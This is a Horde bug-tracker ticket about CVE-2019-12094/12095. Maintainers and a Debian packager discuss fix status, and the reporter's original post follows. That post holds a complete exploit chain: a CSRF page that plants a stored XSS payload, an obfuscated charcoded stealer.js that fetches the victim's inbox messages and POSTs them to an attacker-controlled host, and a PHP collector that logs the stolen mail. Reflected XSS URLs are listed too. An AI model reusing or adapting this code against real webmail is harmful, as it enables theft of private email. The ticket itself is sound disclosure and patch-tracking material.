6.0.0-git
2019-12-06

[#14926] Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22

Summary: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
Queue: Horde Groupware
Queue Version: 5.2.22
Type: Bug
State: Resolved
Priority: 3. High
Owners:
Requester: root (at) numanozdemir (dot) com
Created: 2019-05-17 (203 days ago)
Due:
Updated: 2019-12-04 (2 days ago)
Assigned:
Resolved: 2019-11-18 (18 days ago)
Milestone:
Patch: No

History
2019-12-04 15:10:37 roberto (at) debian (dot) org Comment #7
Thanks for the follow-up.  I also asked MITRE and they offered the 
following clarification:
The stored XSS should be considered part of the CSRF vulnerability 
in CVE-2019-12095, with the CSRF being the primary vulnerability. 
The reflected XSS vectors are all covered by CVE-2019-12094.
The CVE database entries have been updated so as to be clearer.
2019-12-04 00:44:21 Michael Rubinsky Comment #6
As far as I know those are the only two issues applicable to this 
ticket. I think the third was the "exploit" of being able to obtain 
IMAP messages via GET requests, from a webmail application...
2019-12-03 02:57:18 roberto (at) debian (dot) org Comment #5
The original report included the following:
# Attacker can combine "CSRF vulnerability in Trean Bookmarks 
(defaultly installed on Horde Groupware)" and
# "Stored XSS vulnerability in Horde TagCloud (defaultly installed)" 
vulnerabilities to steal victim's emails.

# Also:
# Attacker can use 3 different reflected XSS vulnerability to 
exploit Remote Command Execution, SQL Injection and Code Execution.
I am working on updating the Horde packages in Debian LTS, also 
coordinating with the security team for an update to Debian stable, 
and so some clarification would help.

It is clear that the TagCloud XSS (CVE-2019-12094) was fixed and the 
associated commit was easy to find and applied cleanly to the Horde 
package in Debian.  It is also clear that the CSRF (CVE-2019-12095) 
has been deemed minor and not worth fixing.  However, it is not clear 
that the "3 different reflected XSS vulnerability" have been 
addressed.  Is there an additional vulnerability there beyond those 
two which received CVE assignments?  Answering this would help ensure 
that we properly track the state of Horde in Debian.
2019-11-18 20:25:44 Jan Schneider Comment #4
State ⇒ Resolved
For the record:
* The XSS in the Horde tag cloud widget had already been discovered, 
fixed, and released by ourselves with Horde 5.2.21 on April 21, before 
the report: https://lists.horde.org/archives/announce/2019/001278.html 
Without this, the whole "attack" is not exploitable.
* Adding bookmarks in Trean is indeed not CSRF protected, but that's 
low priority for us, because it's a non-destructive action.
* GETting IMAP messages from IMP is a core functionality of the 
webmail client and can hardly be called a vulnerability. Whether it 
would make sense to token-protect such requests is at least debatable.
* The reporter irresponsibly disclosed his findings, because we were 
not willing, nor able, to pay him a bounty upfront.

Also for the record, these findings have been assigned CVE-2019-12094 
& CVE-2019-12095.

Conclusion: no Horde installation installed or updated since April 
21st 2019 is vulnerable to this exploit.

2019-05-17 20:47:23 root (at) numanozdemir (dot) com Comment #3
2019-05-17 19:59:17 root (at) numanozdemir (dot) com Comment #2
And, CVE numbers: CVE-2019-12094 and CVE-2019-12095.
2019-05-17 19:57:53 root (at) numanozdemir (dot) com Comment #1
Type ⇒ Bug
Due ⇒ 2019-05-20
Summary ⇒ Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
Priority ⇒ 3. High
State ⇒ Unconfirmed
Queue ⇒ Horde Groupware
Milestone ⇒
Patch ⇒ No
# Title: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
# Date: 14.04.2019
# Author: InfinitumIT
# Vendor Homepage: https://www.horde.org/
# Version: Up to v5.2.22.
# info@infinitumit.com.tr && infinitumit.com.tr
# PoC: https://numanozdemir.com/respdisc/horde/horde.mp4

# Description:
# The attacker can combine the "CSRF vulnerability in Trean Bookmarks
# (installed by default on Horde Groupware)" and the
# "Stored XSS vulnerability in Horde TagCloud (installed by default)"
# vulnerabilities to steal the victim's emails.

# Also:
# The attacker can use 3 different reflected XSS vulnerabilities to exploit
# Remote Command Execution, SQL Injection and Code Execution.
# To steal e-mails, the attacker will send an e-mail to the victim and the
# victim will click the attacker's website. Then the victim's inbox will be
# dumped to the attacker's FTP.
# All of these vulnerabilities are valid for all Horde Webmail versions.

# Attacker will exploit the CSRF and XSS with: index.html
# Attacker will steal and post the emails with: stealer.js
# Attacker will save the emails with: stealer.php

# index.html Codes:
<!-- Step 1: forged POST to Trean's add_bookmark action. The victim's session
     cookie is attached because withCredentials is set; the tag value carries
     the stored XSS payload (a script tag pointing at stealer.js). -->
<script>
var url = "http://webmail.victimserver.com/trean/";
var params = 
'iframe=0&popup=0&newFolder=&actionID=add_bookmark&url=http%3A%2F%2Ftest.com&title=vulnerability&description=vulnerability&treanBookmarkTags=%22%3E%3Cscript%2Fsrc%3D%22http%3A%2F%2Fyourwebsite.com%2Fhorde%2Fstealer.js%22%3E%3C%2Fscript%3E';
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
</script>
<!-- Step 2: load the portal page, where the TagCloud block renders the stored
     tag and the injected script tag loads stealer.js in the victim's session. -->
<embed/src="http://webmail.victimserver.com/services/portal/"/height="1"/width="1">


# stealer.js Codes:
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,99,111,100,101,46,106,113,117,101,114,121,46,99,111,109,47,106,113,117,101,114,121,45,51,46,51,46,49,46,109,105,110,46,106,115,39,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,102,117,110,99,116,105,111,110,32,115,116,101,97,108,40,115,116,97,114,116,44,32,101,110,100,41,123,118,97,114,32,115,116,97,114,116,59,118,97,114,32,101,110,100,59,118,97,114,32,105,59,102,111,114,40,105,61,115,116,97,114,116,59,32,105,60,61,101,110,100,59,32,105,43,43,41,123,36,46,103,101,116,40,39,104,116,116,112,58,47,47,119,101,98,109,97,105,108,46,118,105,99,116,105,109,115,101,114,118,101,114,46,99,111,109,47,105,109,112,47,118,105,101,119,46,112,104,112,63,97,99,116,105,111,110,73,68,61,118,105,101,119,95,115,111,117,114,99,101,38,105,100,61,48,38,109,117,105,100,61,123,53,125,73,78,66,79,88,39,43,105,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,123,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,109,108,72,116,116,112,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,112,58,47,47,121,111,117,114,119,101,98,115,105,116,101,46,99,111,109,47,104,111,114,100,101,47,115,116,101,97,108,101,114,46,112,104,112,39,44,32,116,114,117,101,41,59,120,109,108,72,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,39,41,59,120,109,108,72,116,116,112,46,115,101,110,100,40,39,105,110,98,111,120,61,39,43,100,97,116,97,41,59,125,41,59,125,114,101,116,117,114,110,32,105,59,125,115,116,101,97,108,40,56,44,49,53,41,59,60,47,115,99,114,105,112,116,62,34,41,59,10,47,47,32,115,116,101,97,108,40,120,44,121,41,32,61,32,115,116,101,97,108,32,102,114,111,109,32,105,100,32,120,32,116,111,32,105,100,32,121))
// Decoded, the charcoded string above reads (it loads jQuery, then fetches
// message sources from IMP's view.php and POSTs each one to stealer.php):
// document.write("<script src='http://code.jquery.com/jquery-3.3.1.min.js'></script><script>function steal(start, end){var start;var end;var i;for(i=start; i<=end; i++){$.get('http://webmail.victimserver.com/imp/view.php?actionID=view_source&id=0&muid={5}INBOX'+i, function(data){var xmlHttp = new XMLHttpRequest();xmlHttp.open('POST', 'http://yourwebsite.com/horde/stealer.php', true);xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');xmlHttp.send('inbox='+data);});}return i;}steal(8,15);</script>");
// // steal(x,y) = steal from id x to id y
// It is charcoded; first decode it and edit it for yourself, then encode it
// again. Also don't forget to remove spaces!


# stealer.php Codes:
<?php
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Headers: *');

// Append each posted message source to inbox.txt, separated by a rule.
if (!empty($_POST['inbox'])) {
    $logs = fopen("inbox.txt", "a+");
    $data = $_POST['inbox'] . " 
----------------------------------------------------------------- 
" . chr(13) . chr(10) . chr(13) . chr(10);
    fwrite($logs, $data);
    fclose($logs);
}
?>


_____________________________________________________________________________________________________

# Reflected XSS to Remote Command Execution, Remote Code Execution and
# SQL Injection

http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=update_f
http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=remove_f
http://webmail.victimserver.com/groupware/admin/config/diff.php?app=XSS-PAYLOAD-HERE

# The attacker can execute commands & PHP code remotely and inject
# harmful SQL queries. The attacker can also create users with those
# reflected XSS vulnerabilities.

# Stay Secure with InfinitumIT - infinitumit.com.tr
